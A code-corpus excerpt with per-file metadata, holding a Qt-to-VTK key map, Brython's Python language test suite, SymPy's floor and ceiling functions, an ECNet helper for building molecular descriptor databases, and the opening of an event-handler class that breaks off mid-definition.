    Qt.Key_F14: 'F14',
    Qt.Key_F15: 'F15',
    Qt.Key_F16: 'F16',
    Qt.Key_F17: 'F17',
    Qt.Key_F18: 'F18',
    Qt.Key_F19: 'F19',
    Qt.Key_F20: 'F20',
    Qt.Key_F21: 'F21',
    Qt.Key_F22: 'F22',
    Qt.Key_F23: 'F23',
    Qt.Key_F24: 'F24',
    Qt.Key_NumLock: 'Num_Lock',
    Qt.Key_ScrollLock: 'Scroll_Lock',
    }
def _qt_key_to_key_sym(key):
    """Translate a Qt key code into the corresponding VTK keysym.

    Essentially copied from the C++ implementation in
    GUISupport/Qt/QVTKInteractorAdapter.cxx. Returns None when the key
    has no VTK equivalent.
    """
    return _keysyms.get(key)
|
zibneuro/brainvispy
|
gui/vtkqgl.py
|
Python
|
bsd-3-clause
| 18,745
|
[
"CRYSTAL",
"VTK"
] |
1e48a3e7f9c4b09f4c683eb521278d2d63e59d0ac26fe363f65ffbb48cd736eb
|
from tester import assertRaises
# numbers
assert 2 + 2 == 4
assert (50 - 5 * 6) / 4 == 5.0
assert 8 / 4 * 2 == 4.0
assert 8 / 5 == 1.6
assert 7 // 3 == 2
assert 7 // -3 == -3
assert 4 - 2 - 2 == 0
width = 20
height = 5 * 9
assert width * height == 900
x = 6
x += 7 + 8
assert x == 21
x = y = z = 0
assert x == 0
assert y == 0
assert z == 0
# hex, octal, binary literals
a = 0xaf
assert a == 175
a = 0Xaf
assert a == 175
a = 0o754
assert a == 492
a = 0O754
assert a == 492
a = 0b10100110
assert a == 166
a = 0B10100110
assert a == 166
# bitwise operators
assert ~3 == -4
x = 3
assert ~x == -4
assert ~1 & ~10 | 8 == -4
assert 2 << 16 == 131072
assert 131072 >> 16 == 2
# __neg__
assert -x == -3
y = 2.1
assert -y == -2.1
# n must be undefined at this point, so referencing it raises NameError.
# (Resolves the old "not sure how to convert this to assert (raise)?" note:
# the previous bare try/except would silently pass even if n were defined.)
assertRaises(NameError, lambda: n)
assert 3 * 3.75 / 1.5 == 7.5
assert 7.0 / 2 == 3.5
# strings
assert 'spam eggs' == "spam eggs"
assert 'doesn\'t' == "doesn't"
assert '"Yes," he said.' == "\"Yes,\" he said."
assert '"Isn\'t," she said.' == "\"Isn't,\" she said."
hello = "This is a rather long string containing\n\
several lines of text just as you would do in C.\n\
Note that whitespace at the beginning of the line is\
significant."
assert len(hello) == 158
hello = """\
Usage: thingy [OPTIONS]
-h Display this usage message
-H hostname Hostname to connect to
"""
assert len(hello) == 136
hello1 = """This is a rather long string containing
several lines of text just as you would do in C.
Note that whitespace at the beginning of the line is
significant."""
assert len(hello1) == 159
hello = r"This is a rather long string containing\n\
several lines of text much as you would do in C."
assert len(hello) == 91
word = 'Help' + 'A'
assert word == 'HelpA'
assert word * 5 == "HelpAHelpAHelpAHelpAHelpA"
assert 'str' 'ing' == 'string'
assert 'str'.strip() + 'ing' == 'string'
assert ' str '.strip() + 'ing' == 'string'
# string methods
x = 'fooss'
assert x.replace('o', 'X', 20) == 'fXXss'
assert 'GhFF'.lower() == 'ghff'
assert x.lstrip('of') == 'ss'
x = 'aZjhkhZyuy'
assert x.find('Z') == 1
assert x.rfind('Z') == 6
assert x.rindex('Z') == 6
# 'K' does not occur in x, so rindex must raise ValueError. The previous
# hand-rolled try/except called x.rindex('K') a second time in its failure
# message, which would re-raise instead of reporting the failure.
assertRaises(ValueError, x.rindex, 'K')
assert x.split('h') == ['aZj', 'k', 'Zyuy']
assert x.split('h', 1) == ['aZj', 'khZyuy']
assert x.split('h', 2) == ['aZj', 'k', 'Zyuy']
assert x.rsplit('h') == ['aZj', 'k', 'Zyuy']
assert x.rsplit('h', 1) == ['aZjhk', 'Zyuy']
assert x.rsplit('y', 2) == ['aZjhkhZ', 'u', '']
assert x.startswith('aZ')
assert x.strip('auy') == 'ZjhkhZ'
assert x.upper() == 'AZJHKHZYUY'
# list examples
a = ['spam', 'eggs', 100, 1234]
assert a[:2] + ['bacon', 2 * 2] == ['spam', 'eggs', 'bacon', 4]
assert 3 * a[:3] + ['Boo!'] == ['spam', 'eggs', 100, 'spam', 'eggs', 100,
'spam', 'eggs', 100, 'Boo!']
assert a[:] == ['spam', 'eggs', 100, 1234]
a[2] = a[2] + 23
assert a == ['spam', 'eggs', 123, 1234]
a[0:2] = [1, 12]
assert a == [1, 12, 123, 1234]
a[0:2] = []
assert a == [123, 1234]
a[1:1] = ['bletch','xyzzy']
assert a == [123, 'bletch', 'xyzzy', 1234]
a[:0] = a
assert a == [123, 'bletch', 'xyzzy', 1234, 123, 'bletch', 'xyzzy', 1234]
a[:] = []
assert a == []
a.extend('ab')
assert a == ['a', 'b']
a.extend([1, 2, 33])
assert a == ['a', 'b', 1, 2, 33]
# lambda
g = lambda x, y=99: 2 * x + y
assert g(10, 6) == 26
assert g(10) == 119
x = [lambda x: x * 2,lambda y: y * 3]
assert x[0](5) == 10
assert x[1](10) == 30
# inline functions and classes
def foo(x):return 2 * x
assert foo(3) == 6
class foo(list): pass
class bar(foo): pass
assert str(bar()) == "[]"
i = 10
while i > 0: i -= 1
if not True:print('true!')
else:pass
assert bin(12) == '0b1100'
assert oct(12) == '0o14'
assert hex(12) == '0xc'
assert bin(-12) == '-0b1100'
assert oct(-12) == '-0o14'
assert hex(-12) == '-0xc'
# bytes
b = b'12345'
assert len(b) == 5
# enumerate
enum_obj = enumerate('abcdefghij')
enum_first = next(enum_obj)
assert isinstance(enum_first, tuple)
assert enum_first[0] == 0
enum_obj = enumerate(['first', 'second'], start=1)
enum_first = next(enum_obj)
assert enum_first[0] == 1
# filter
test_list = [0, -1, 1, 2, -2]
true_values = list(filter(None, test_list))
assert true_values == [-1, 1, 2, -2]
negative_values = list(filter(lambda x: x < 0, test_list))
assert negative_values == [-1, -2]
# dir
class FooParent():
const = 0
class Foo(FooParent):
def do_something(self):
pass
foo = Foo()
foo_contents = dir(foo)
assert 'do_something' in foo_contents
assert 'const' in foo_contents
# non-ASCII variable names
donnée = 10
машина = 9
ήλιος = 4
assert donnée + машина + ήλιος == 23
# Korean
def 안녕하세요():
return "hello"
assert 안녕하세요() == "hello"
# functions and methods
class foo:
def method(self, x):
return(x)
assert foo().method(5) == 5
a = foo.method
assert foo.method == foo.method
x = foo()
assert x.method == x.method
def m1(self, x):
return 2 * x
foo.method = m1
b = foo.method
assert a != b
assert foo().method(5) == 10
y = foo()
assert x.method != y.method
def f():
pass
def g():
pass
assert f != g
# use of "global" in functions
a = 9
def f():
global a
res = [x for x in range(a)]
a = 8
return res
assert f() == [0, 1, 2, 3, 4, 5, 6, 7, 8]
assert a == 8
# nested function scopes
def f(method, arg):
def cb(ev):
return method(ev, arg)
return cb
def g(*z):
return z
a = f(g, 5)
b = f(g, 11)
assert a(8) == (8, 5)
assert b(13) == (13, 11)
# nonlocal and global
x = 0
def f():
x = 1
res = []
def g():
global x
return x
res.append(g())
def h():
nonlocal x
return x
res.append(h())
return res
assert f() == [0, 1]
def P():
b = 1
def Q():
nonlocal b
b += 1
return b
return Q()
assert P() == 2
# use imported names : override built-in range
from a import *
res = []
for i in range(10):
res.append(i)
assert res == ['a', 'b', 'c']
# restore built-in range
range = __builtins__.range
assert list(range(2)) == [0, 1]
# __setattr__ defined in a class
class A:
def __init__(self, x):
self.x = x
def __setattr__(self, k, v):
object.__setattr__(self, k, 2 * v)
a = A(4)
assert a.x == 8
# nested scopes
def f():
x = 1
def g():
assert x == 1
def h():
assert x == 1
return x + 1
return h()
return g()
assert f() == 2
# check that name "constructor" is valid
constructor = 0
# exception attributes
try:
'a' + 2
except TypeError as exc:
pass #assert exc.args[0] == "Can't convert int to str implicitly", exc.args
# check that line is in exception info
x = []
try:
x[1]
except IndexError as exc:
assert exc.args[0] == 'list index out of range'
# vars()
class A:
def __init__(self, x):
self.x = x
assert A(5).__dict__ == {'x': 5}
assert vars(A(5)) == {'x': 5}
# @ operator (PEP 465)
class A:
def __init__(self, a, b, c, d):
self.a = a
self.b = b
self.c = c
self.d = d
def __matmul__(self, other):
return A(
self.a * other.a + self.b * other.c,
self.a * other.b + self.b * other.d,
self.c + other.a + self.d + other.c,
self.c * other.b + self.d * other.d)
def __rmatmul__(self, other):
return A(
other.a * self.a + other.b * self.c,
other.a * self.b + other.b * self.d,
other.c + self.a + other.d + self.c,
other.c * self.b + other.d * self.d)
def __str__(self):
return "({} {})\n({} {})".format(self.a, self.b,
self.c, self.d)
def __eq__(self, other):
return (self.a == other.a and
self.b == other.b and
self.c == other.c and
self.d == other.d)
a1 = A(1, 2, 3, 4)
a2 = A(2, 3, 4, 5)
a3 = A(10, 13, 13, 29)
assert a1 @ a2 == a3
a1 @= a2
assert a1 == a3
class B:
def __init__(self, a, b, c, d):
self.a = a
self.b = b
self.c = c
self.d = d
assert B(1, 2, 3, 4) @ A(2, 3, 4, 5) == a3
# sys.exc_info
import sys
try:
1 / 0
except:
exc_class, exc, tb = sys.exc_info()
assert exc_class is ZeroDivisionError
assert sys.exc_info() == (None, None, None)
try:
1 / 0
except ZeroDivisionError:
assert sys.exc_info()[0] is ZeroDivisionError
finally:
assert sys.exc_info() == (None, None, None)
# comparisons with None
msg = "'{}' not supported between instances of '{}' and 'NoneType'"
class X:
pass
for value in [0.,
0,
"a",
b"a",
(bytearray(b'ab'), "bytearray(b'ab')"),
((), "()"),
[],
({}, "{{}}"),
set(),
frozenset(),
1j,
None,
True,
False,
(SyntaxError, "SyntaxError"),
(range(2), "range(2)"),
((x for x in range(2)), "(x for x in range(2))"),
(map(len, ["a", "bc"]), 'map(len, ["a", "bc"])'),
(zip(["a", "b"], [1, 2]), 'zip(["a", "b"], [1, 2])'),
(len, "len"),
(X, "X"),
(X(), "X()")]:
if isinstance(value, tuple):
value, vrepr = value
else:
vrepr = repr(value)
s = f"{vrepr} {{}} None"
for op in [">", "<", ">=", "<="]:
try:
eval(s.format(op))
raise Exception(f"{op} should have raised TypeError")
except Exception as exc:
assert exc.args[0] == msg.format(op, type(value).__name__), \
(op, exc.args[0], msg.format(op, type(value).__name__))
if value is not None:
assert value != None
assert not (value == None)
# PEP 570 (positional-only parameters)
def pos_only_arg(arg, /):
return arg
pos_only_arg(1)
assertRaises(TypeError, pos_only_arg, arg=2)
def kwd_only_arg(*, arg):
return arg
assert kwd_only_arg(arg=2) == 2
assertRaises(TypeError, kwd_only_arg, 1)
def combined_example(pos_only, /, standard, *, kwd_only):
return pos_only, standard, kwd_only
assert combined_example(1, 2, kwd_only=3) == (1, 2, 3)
assert combined_example(1, standard=2, kwd_only=3) == (1, 2, 3)
assertRaises(TypeError, combined_example, 1, 2, 3)
# del
attr = 5
del attr
for attr in range(5):
pass
# PEP 572 (assignement expressions)
def f(x):
return x
(y := f(8))
assert y == 8
assertRaises(SyntaxError, exec, "y0 = y1 := f(5)")
y0 = (y1 := f(5))
assert y0 == 5
assert y1 == 5
assertRaises(SyntaxError, exec, "foo(x = y := f(x))")
assertRaises(SyntaxError, exec,
"""def foo(answer = p := 42):
pass""")
def foo(answer=(p := 42)):
return answer, p
assert foo() == (42, 42)
assert foo(5) == (5, 42)
assertRaises(SyntaxError, exec,
"""def foo(answer: p := 42 = 5):
pass""")
def foo1(answer: (p := 42) = 5):
return (answer, p)
assert foo1() == (5, 42)
assert foo1(8) == (8, 42)
assertRaises(SyntaxError, exec, "lambda x:= 1")
assertRaises(SyntaxError, exec, "(lambda x:= 1)")
f = lambda: (x := 1)
assert f() == 1
assert f'{(xw:=10)}' == "10"
assert xw == 10
z = 3
assert f'{z:=5}' == ' 3'
total = 0
partial_sums = [total := total + v for v in range(5)]
assert total == 10
def assign_expr_in_comp_global():
global total
[total := total + v for v in range(5)]
assign_expr_in_comp_global()
assert total == 20
def assign_expr_in_comp_nonlocal():
x = 0
def g():
nonlocal x
[ x := x + i for i in range(5)]
g()
return x
assert assign_expr_in_comp_nonlocal() == 10
# operation with unary neg
def f(x, y):
return -x[1]*y[2], -x[0]*y[2]
assert f([1, 2, 3], [4, 5, 6]) == (-12, -6)
# issue 1355
def f():
[{ # comment
0: 0} # comment
for _ in []]
# issue 1363
a = (b) = (c) = "test"
assert a == "test"
assert b == "test"
assert c == "test"
# issue 1387
x = 10
a = -7
b = a + 5 * x if a < 0 else a
assert b == 43
a = 7
b = a + 5 * x if a < 0 else a
assert b == 7
# PEP 585
import types
assert str(list[str]) == 'list[str]'
assert str(list[str, int]) == 'list[str, int]'
assert str(list[int, ...]) == 'list[int, ...]'
assert str(tuple[str]) == 'tuple[str]'
assert isinstance(list[str], types.GenericAlias)
try:
isinstance([1, 2, 3], list[str])
raise Exception("should have raised TypeError")
except TypeError:
pass
try:
issubclass(list, list[str])
raise Exception("should have raised TypeError")
except TypeError:
pass
assert list[str]([2, 'a']) == [2, 'a']
assert list[str].__origin__ is list
assert list[str].__args__ == (str,)
assert not (list is list[str])
assert list != list[str]
assert list[str] == list[str]
# issue 1535
assert [x for x in "abc" if "xyz"[0 if 1 else 2] < "z"] == ['a', 'b', 'c']
# issue 1545
assert (lambda:
# A greeting.
'hi')() == 'hi'
assert (lambda: (
# A greeting.
"hi"
))() == 'hi'
assert (lambda: (
'''
# not a comment
hi
'''
))() == "\n # not a comment\n hi\n "
assert lambda:( # A greeter.
print('hi') # Short for "Hello".
)() == 'hi'
# issue 1557
assertRaises(SyntaxError, exec, "a, b += 1")
assertRaises(SyntaxError, exec, "(a, b) += 1")
assertRaises(SyntaxError, exec, "[a, b] += 1")
assertRaises(SyntaxError, exec, "{a, b} += 1")
assertRaises(SyntaxError, exec, "{a: 0, b: 1} += 1")
assertRaises(SyntaxError, exec, "{} += 1")
# issue 1642
assertRaises(SyntaxError, exec, "(=)")
assertRaises(SyntaxError, exec, "(=0)")
assertRaises(SyntaxError, exec, '(=")')
# issue 1654
class MyClass(list):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for index in range(len(self)):
argument = self[index]
if type(argument) == list:
argument = self.__class__(argument)
self[index] = argument
a = MyClass([1, 2, [3, 4, 5]])
assert type(a[2]) is MyClass
# issue 1693
t = []
if 1: t.append('a');t.append('b')
else: t.append('c')
assert t == ['a', 'b']
t = []
if 1: t.append('a');t.append('b');
else: t.append('c')
assert t == ['a', 'b']
lambda:{};t.append('c');
assert t[-1] == 'c'
# issue 1697
try:
for x1697.y in [0]:
pass
raise Exception('should have raised NameError')
except NameError:
pass
# issue 1718 (tabulations)
characters = {
"amber": {
'ascension': {
'element_1': 'agnidus_agate',
},
'element': 'pyro'
}
}
# issue 1721
def f():
y = g(0 <= x <= 1)
return y
def g(x):
return x
x = 0.5
assert f()
x = 2
assert not f()
# issue 1802
assertRaises(SyntaxError, exec, ".x = 4")
# issue 1803
assertRaises(SyntaxError, exec, "050")
# issue 1807
assertRaises(SyntaxError, exec, '-')
# issue 1819
assert eval("-5 - 8") == -13
assert [0 < a < 2 for a in (0, 1)] == [False, True]
# unpacking in "for" target
lists = [
[0, 1, 2, 3],
['ab', 'b', 'c']
]
groups = []
for x, *y, z in lists:
groups.append((x, y, z))
assert groups == [(0, [1, 2], 3), ('ab', ['b'], 'c')]
# various flavours of try / except / else / finally
def try_except1():
try:
return 1
except ZeroDivisionError:
return 2
assert try_except1() == 1
def try_except2():
try:
return 1 / 0
except ZeroDivisionError:
return 2
assert try_except2() == 2
def try_except_else1():
try:
return 1
except ZeroDivisionError:
return 2
else:
return 3
assert try_except_else1() == 1
def try_except_else2():
try:
return 1 / 0
except ZeroDivisionError:
return 2
else:
return 3
assert try_except_else2() == 2
def try_finally():
try:
return 1
finally:
return 4
assert try_finally() == 4
def try_except_else_finally():
try:
return 1
except ZeroDivisionError:
return 2
else:
return 3
finally:
return 4
#assert try_except_else_finally() == 4
print('passed all tests...')
|
brython-dev/brython
|
www/tests/test_suite.py
|
Python
|
bsd-3-clause
| 16,189
|
[
"Amber"
] |
dd215688d56e2f045ec9a34acc0efce27a9c2c0efa1de76f004bab5df7d15499
|
from __future__ import print_function, division
from sympy.core.basic import C
from sympy.core.singleton import S
from sympy.core.function import Function
from sympy.core import Add
from sympy.core.evalf import get_integer_part, PrecisionExhausted
###############################################################################
######################### FLOOR and CEILING FUNCTIONS #########################
###############################################################################
class RoundFunction(Function):
    """The base class for rounding functions (floor and ceiling).

    Subclasses supply ``_dir`` (-1 for floor, +1 for ceiling) and a
    ``_eval_number`` hook that rounds exact numbers/NumberSymbols.
    """
    nargs = 1

    @classmethod
    def eval(cls, arg):
        # Integers (and symbols known to be integer) are fixed points.
        if arg.is_integer:
            return arg
        # Purely imaginary argument: round the imaginary part and
        # re-attach the imaginary unit.
        if arg.is_imaginary:
            return cls(C.im(arg))*S.ImaginaryUnit
        # Exact numeric arguments are handled by the subclass hook.
        v = cls._eval_number(arg)
        if v is not None:
            return v
        # Integral, numerical, symbolic part
        ipart = npart = spart = S.Zero
        # Extract integral (or complex integral) terms
        terms = Add.make_args(arg)
        for t in terms:
            if t.is_integer or (t.is_imaginary and C.im(t).is_integer):
                ipart += t
            elif t.has(C.Symbol):
                spart += t
            else:
                npart += t
        if not (npart or spart):
            return ipart
        # Evaluate npart numerically if independent of spart
        # (real/imaginary parts do not interact in that case).
        if npart and (
            not spart or
            npart.is_real and spart.is_imaginary or
            npart.is_imaginary and spart.is_real):
            try:
                re, im = get_integer_part(
                    npart, cls._dir, {}, return_ints=True)
                ipart += C.Integer(re) + C.Integer(im)*S.ImaginaryUnit
                npart = S.Zero
            except (PrecisionExhausted, NotImplementedError):
                # Fall through: keep npart symbolic inside the function.
                pass
        spart = npart + spart
        if not spart:
            return ipart
        elif spart.is_imaginary:
            # Round the imaginary remainder separately, unevaluated to
            # avoid infinite recursion through eval().
            return ipart + cls(C.im(spart), evaluate=False)*S.ImaginaryUnit
        else:
            return ipart + cls(spart, evaluate=False)

    def _eval_is_bounded(self):
        # Rounding a bounded quantity stays bounded.
        return self.args[0].is_bounded

    def _eval_is_real(self):
        return self.args[0].is_real

    def _eval_is_integer(self):
        # floor/ceiling of a real argument is an integer.
        return self.args[0].is_real
class floor(RoundFunction):
    """
    Floor is a univariate function which returns the largest integer
    value not greater than its argument. However this implementation
    generalizes floor to complex numbers.

    More information can be found in "Concrete mathematics" by Graham,
    pp. 87 or visit http://mathworld.wolfram.com/FloorFunction.html.

    >>> from sympy import floor, E, I, Float, Rational
    >>> floor(17)
    17
    >>> floor(Rational(23, 10))
    2
    >>> floor(2*E)
    5
    >>> floor(-Float(0.567))
    -1
    >>> floor(-I/2)
    -I

    See Also
    ========
    ceiling
    """
    # Rounding direction used by get_integer_part in RoundFunction.eval.
    _dir = -1

    @classmethod
    def _eval_number(cls, arg):
        """Round an exact number (or NumberSymbol) down; None otherwise."""
        if arg.is_Number:
            if arg.is_Rational:
                # Python's // already floors for negative rationals.
                return C.Integer(arg.p // arg.q)
            elif arg.is_Float:
                return C.Integer(int(arg.floor()))
            else:
                # Infinities, NaN: floor is the argument itself.
                return arg
        if arg.is_NumberSymbol:
            # Lower end of the bracketing integer interval (e.g. 2 for E).
            return arg.approximation_interval(C.Integer)[0]

    def _eval_nseries(self, x, n, logx):
        r = self.subs(x, 0)
        args = self.args[0]
        args0 = args.subs(x, 0)
        if args0 == r:
            # Argument sits exactly on an integer at x=0: the series value
            # depends on the approach direction of the leading term.
            direction = (args - args0).leadterm(x)[0]
            if direction.is_positive:
                return r
            else:
                return r - 1
        else:
            return r
class ceiling(RoundFunction):
    """
    Ceiling is a univariate function which returns the smallest integer
    value not less than its argument. Ceiling function is generalized
    in this implementation to complex numbers.

    More information can be found in "Concrete mathematics" by Graham,
    pp. 87 or visit http://mathworld.wolfram.com/CeilingFunction.html.

    >>> from sympy import ceiling, E, I, Float, Rational
    >>> ceiling(17)
    17
    >>> ceiling(Rational(23, 10))
    3
    >>> ceiling(2*E)
    6
    >>> ceiling(-Float(0.567))
    0
    >>> ceiling(I/2)
    I

    See Also
    ========
    floor
    """
    # Rounding direction used by get_integer_part in RoundFunction.eval.
    _dir = 1

    @classmethod
    def _eval_number(cls, arg):
        """Round an exact number (or NumberSymbol) up; None otherwise."""
        if arg.is_Number:
            if arg.is_Rational:
                # ceil(p/q) == -floor(-p/q); // floors, so negate twice.
                return -C.Integer(-arg.p // arg.q)
            elif arg.is_Float:
                return C.Integer(int(arg.ceiling()))
            else:
                # Infinities, NaN: ceiling is the argument itself.
                return arg
        if arg.is_NumberSymbol:
            # Upper end of the bracketing integer interval (e.g. 3 for E).
            return arg.approximation_interval(C.Integer)[1]

    def _eval_nseries(self, x, n, logx):
        r = self.subs(x, 0)
        args = self.args[0]
        args0 = args.subs(x, 0)
        if args0 == r:
            # Argument sits exactly on an integer at x=0: the series value
            # depends on the approach direction of the leading term.
            direction = (args - args0).leadterm(x)[0]
            if direction.is_positive:
                return r + 1
            else:
                return r
        else:
            return r
|
hrashk/sympy
|
sympy/functions/elementary/integers.py
|
Python
|
bsd-3-clause
| 5,111
|
[
"VisIt"
] |
62ea27e1004d99285812ee9984394ead8ef45ec86ebff91fea880bae8e4b01f3
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# ecnet/tools/database.py
# v.3.3.2
# Developed in 2020 by Travis Kessler <travis.j.kessler@gmail.com>
#
# Contains functions for creating ECNet-formatted databases
#
# Stdlib imports
from csv import writer
from datetime import datetime
from os import remove
from warnings import warn
# 3rd party imports
from alvadescpy import smiles_to_descriptors
from padelpy import from_mdl, from_smiles
try:
import pybel
except ImportError:
pybel = None
class _Molecule:
    """Internal container for one row of an ECNet-formatted database."""

    def __init__(self, id):
        # DATAID column value (id_prefix + zero-padded index)
        self.id = id
        # ASSIGNMENT column; 'L' (learn set) by default
        self.assignment = 'L'
        # STRING columns; 'Compound Name' is always present
        self.strings = {'Compound Name': ''}
        # TARGET (experimental) value; 0 when no targets are supplied
        self.target = 0
        # dict of descriptor name -> value, filled in by create_db
        self.inputs = None
def create_db(smiles: list, db_name: str, targets: list = None,
              id_prefix: str = '', extra_strings: dict = None,
              backend: str = 'padel', convert_mdl: bool = False):
    ''' create_db: creates an ECNet-formatted database from SMILES strings
    using either PaDEL-Descriptor or alvaDesc software; using alvaDesc
    requires a valid installation/license of alvaDesc

    Args:
        smiles (list): list of SMILES strings
        db_name (str): name/path of database being created
        targets (list): target (experimental) values, align with SMILES
            strings; if None, all TARGETs set to 0
        id_prefix (str): prefix of molecule DATAID, if desired
        extra_strings (dict): extra STRING columns, label = name, value = list
            with length equal to number of SMILES strings
        backend (str): software used to calculate QSPR descriptors, 'padel' or
            'alvadesc'
        convert_mdl (bool): if `True`, converts SMILES strings to MDL 3D
            format before calculating descriptors (PaDEL only)

    Raises:
        ValueError: if target/extra-string lengths do not match `smiles`,
            or `backend` is unknown
        ImportError: if `convert_mdl` is True but pybel is not installed
        RuntimeError: if no descriptors could be calculated at all
    '''
    # Avoid the shared-mutable-default pitfall; an explicit {} still works.
    if extra_strings is None:
        extra_strings = {}

    # Validate alignment of optional per-molecule data with `smiles`.
    if targets is not None:
        if len(targets) != len(smiles):
            raise ValueError('Must supply same number of targets as SMILES '
                             'strings: {}, {}'.format(
                                 len(targets), len(smiles)
                             ))
    for string in list(extra_strings.keys()):
        if len(extra_strings[string]) != len(smiles):
            # Bug fix: the original .format() supplied two arguments for
            # three placeholders, raising IndexError instead of ValueError.
            raise ValueError('Extra string values for {} not equal in length '
                             'to supplied SMILES: {}, {}'.format(
                                 string, len(extra_strings[string]),
                                 len(smiles)
                             ))

    mols = []        # descriptor dicts, aligned with the surviving SMILES
    failed_idx = []  # indices of molecules whose descriptors failed

    if backend == 'alvadesc':
        for mol in smiles:
            mols.append(smiles_to_descriptors(mol))
    elif backend == 'padel':
        for idx, mol in enumerate(smiles):
            if convert_mdl is True:
                if pybel is None:
                    raise ImportError(
                        'pybel (Python Open Babel wrapper) not installed, '
                        'cannot convert SMILES to MDL'
                    )
                mdl = pybel.readstring('smi', mol)
                mdl.make3D()
                # Timestamped name avoids clashing temp files.
                curr_time = datetime.now().strftime('%Y%m%d%H%M%S%f')[:-3]
                mdl_name = '{}.mdl'.format(curr_time)
                mdl.write('mdl', mdl_name)
                try:
                    mols.append(from_mdl(mdl_name)[0])
                except RuntimeError:
                    warn('Could not calculate descriptors for {}, omitting'
                         .format(mol), RuntimeWarning)
                    failed_idx.append(idx)
                remove(mdl_name)
            else:
                try:
                    mols.append(from_smiles(mol))
                except RuntimeError:
                    warn('Could not calculate descriptors for {}, omitting'
                         .format(mol), RuntimeWarning)
                    failed_idx.append(idx)
    else:
        raise ValueError('Unknown backend software: {}'.format(backend))

    # Bug fix: the original deleted from `smiles`/`targets`/`extra_strings`
    # *while enumerating them*, which skips elements and corrupts every
    # subsequent index.  Delete after the loop, in reverse, so earlier
    # indices stay valid and rows remain aligned with `mols`.
    for idx in reversed(failed_idx):
        del smiles[idx]
        if targets is not None:
            del targets[idx]
        for string in extra_strings:
            del extra_strings[string][idx]

    if not mols:
        # Guard: `mols[0]` below would otherwise raise a bare IndexError.
        raise RuntimeError('No descriptors could be calculated for the '
                           'supplied SMILES strings')

    # Build the two header rows (column types, column titles).
    type_row = ['DATAID', 'ASSIGNMENT', 'STRING', 'STRING']
    title_row = ['DATAID', 'ASSIGNMENT', 'Compound Name', 'SMILES']
    strings = list(extra_strings.keys())
    for string in strings:
        if string != 'Compound Name':
            type_row.append('STRING')
            title_row.append(string)
    type_row.append('TARGET')
    title_row.append('TARGET')
    descriptor_keys = list(mols[0].keys())
    for key in descriptor_keys:
        type_row.append('INPUT')
        title_row.append(key)

    # Assemble one _Molecule per surviving SMILES string.
    mol_rows = []
    for idx, desc in enumerate(mols):
        # Replace missing descriptor values with 0.
        for key in descriptor_keys:
            if desc[key] == 'na' or desc[key] == '':
                desc[key] = 0
        mol = _Molecule('{}'.format(id_prefix) + '%04d' % (idx + 1))
        for string in strings:
            mol.strings[string] = extra_strings[string][idx]
        if targets is not None:
            mol.target = targets[idx]
        mol.inputs = desc
        mol_rows.append(mol)

    # Write the database; `with` closes the file (the explicit close()
    # in the original was redundant).
    with open(db_name, 'w', encoding='utf-8') as db_file:
        wr = writer(db_file, delimiter=',', lineterminator='\n')
        wr.writerow(type_row)
        wr.writerow(title_row)
        for idx, mol in enumerate(mol_rows):
            row = [mol.id, mol.assignment, mol.strings['Compound Name'],
                   smiles[idx]]
            for string in strings:
                if string != 'Compound Name':
                    row.append(mol.strings[string])
            row.append(mol.target)
            for key in descriptor_keys:
                row.append(mol.inputs[key])
            wr.writerow(row)
|
TJKessler/ECNet
|
ecnet/tools/database.py
|
Python
|
mit
| 5,843
|
[
"Open Babel",
"Pybel"
] |
5b14042181c4ef7ba4c6cae7deeb11d5f78b3ef37b5a16d53172522641398441
|
# -*- coding: utf8 -*-
from .exceptions import StopPropagation
from .event import Event
from ..typing import AbstractHandler, Modifiers
def always_true(event):
    """Default handler condition: accept every event (PEP 8: prefer a
    named ``def`` over binding a lambda to a name)."""
    return True
class HandlerModifiers(Modifiers):
    # Hooks invoked during Modifiers.visit; presumably `visited` is the
    # Handler being visited and `visitor` each candidate callable --
    # confirm against eventize.typing.Modifiers.

    def refuse(self, visited, visitor):
        """if not a visitor, it is a callback"""
        # A plain callable is registered on the handler as a callback.
        visited.append(visitor)

    def reject(self, visited, visitor):
        # A rejected visitor is dropped from this modifier collection.
        self.remove(visitor)
class Handler(AbstractHandler):
    """A list-like collection of callbacks notified when an event propagates.

    NOTE(review): AbstractHandler appears to be list-based -- methods below
    call list.append/list.insert/list.extend/list.__setitem__ on self;
    confirm in ..typing.
    """
    # Event class instantiated by make_event; subclasses may override.
    event_type = Event

    def __init__(self, *callbacks, **options):
        # Callbacks are routed through HandlerModifiers.visit: visitors
        # modify the handler, plain callables end up appended to it.
        self.visitors = HandlerModifiers(callbacks)
        self.events = tuple()  # history of events propagated so far
        # Every keyword option becomes an attribute (e.g. condition=...).
        for item, value in tuple(options.items()):
            setattr(self, item, value)
        self.visitors.visit(self)

    @property
    def condition(self):
        # Defaults to accepting every event when no condition was set.
        return getattr(self, '_condition', always_true)

    @condition.setter
    def condition(self, condition):
        self._assert_valid(condition)
        self._condition = condition

    @condition.deleter
    def condition(self):
        delattr(self, '_condition')

    def notify(self, *args, **kwargs):
        """Build an event from the arguments and propagate it."""
        event = self.make_event(*args, **kwargs)
        return self.propagate(event)

    def make_event(self, *args, **kwargs):
        return self.event_type(*args, **kwargs)

    def __call__(self, event):
        # Calling the handler propagates and returns the event's result.
        return self.propagate(event).returns()

    def propagate(self, event):
        """Run the event through every registered callback.

        Records the event, checks the condition, then triggers each
        callback; StopPropagation aborts silently at any stage.
        """
        self.events += (event, )
        try:
            self.before_propagation(event)
            self._assert_condition(event)
            # tuple() forces the lazy map; event.trigger runs each callback.
            tuple(map(event.trigger, self))
            self.after_propagation(event)
        except StopPropagation:
            pass
        return event

    def before_propagation(self, event):
        # Hook for subclasses; runs before the condition check.
        pass

    def after_propagation(self, event):
        # Hook for subclasses; runs after all callbacks succeeded.
        pass

    def _assert_condition(self, event):
        # Stops propagation (rather than raising to the caller) when the
        # handler's condition rejects the event.
        if not self.condition(event):
            msg = "Condition '%s' for event '%s' return False"
            event.stop_propagation(msg % (id(self.condition), type(event).__name__))

    def when(self, condition):
        """Return a sub-handler guarded by `condition`, creating it once.

        Equality of handlers is by condition (see __eq__), so a second
        call with the same condition returns the existing sub-handler.
        """
        cond = type(self)(condition=condition)
        try:
            index = self.index(cond)
        except ValueError:
            index = len(self)
            self.append(cond)
        return self[index]

    def append(self, callback):
        self._assert_valid(callback)
        list.append(self, callback)
        return self

    def prepend(self, callbacks):
        # Re-build the list with `callbacks` first, then the old contents.
        currents = list(self)
        self.empty()
        self.extend(callbacks)
        list.extend(self, currents)
        return self

    def insert(self, key, callback):
